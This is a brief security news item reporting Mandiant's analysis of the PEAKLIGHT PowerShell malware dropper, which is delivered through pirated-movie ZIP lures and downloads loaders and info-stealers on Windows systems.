Windows systems have been subjected to intrusions involving pirated movie lures to deploy the novel PEAKLIGHT malware dropper, which facilitates the delivery of various malware-as-a-service payloads, The Hacker News reports.
Attacks commenced with the download of malicious ZIP files purporting to be pirated movies that contain an LNK file, which links with a memory-only JavaScript dropper-hosting content delivery network to execute PEAKLIGHT, according to an analysis from Mandiant. Researchers added that PEAKLIGHT then enables the retrieval of the Hijack Loader — also known as SHADOWLADDER, IDAT Loader, and DOILoader — as well as CryptBot, and Lumma Stealer. "PEAKLIGHT is an obfuscated PowerShell-based downloader that is part of a multi-stage execution chain that checks for the presence of ZIP archives in hard-coded file paths. If the archives do not exist, the downloader will reach out to a CDN site and download the remotely hosted archive file and save it to disk," said researchers.
